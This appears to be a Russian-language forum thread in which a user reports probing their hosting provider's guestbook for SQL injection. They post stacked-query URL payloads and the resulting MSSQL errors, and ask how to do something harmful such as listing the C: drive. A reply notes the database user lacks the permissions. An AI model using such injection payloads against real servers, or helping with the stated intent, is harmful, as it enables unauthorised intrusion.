Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
SQL-Injection
 
На сервере прова в гуестбуке как мне кажется SQL-Injection нашёл.При запросе /feedback/?pe=&se=&page=0;use%20master; выводит:
Warning: mssql_query() [function.mssql-query]: message: Could not find stored procedure 'gb_msg_browse'. (severity 16) in c:\hosting\php\wcl\db.php on line 86

Warning: mssql_query() [function.mssql-query]: Query failed in c:\hosting\php\wcl\db.php on line 86

Warning: mssql_fetch_array(): supplied argument is not a valid MS SQL-result resource in c:\hosting\php\wcl\db.php on line 94


Как сделать чё-нить нехорошее, ну например вывести листинг диска С:? Как воспользоваться?
 
а если /feedback/?pe=&se=&page=0;CREATE%20TABLE%20mytbl%20(a%20int); то:
Warning: mssql_query() [function.mssql-query]: message: CREATE TABLE permission denied in database 'gbook'. (severity 14) in c:\hosting\php\wcl\db.php on line 86
 
Цитата
MishaSt пишет:
а если /feedback/?pe=&se=&page=0;CREATE%20TABLE%20mytbl%20(a%20int); то:
Warning: mssql_query() [function.mssql-query]: message: CREATE TABLE permission denied in database 'gbook'. (severity 14) in c:\hosting\php\wcl\db.php on line 86
У Web пользователя не хватает прав. Поэтому  что-либо деструктивное вряд ли получится сделать.
Хочешь быть мудрым? Не желай всего, что видишь; не верь всему, что слышишь; не говори всего, что знаешь; не делай всего, что умеешь, а только то, что полезно.
Страницы: 1
Читают тему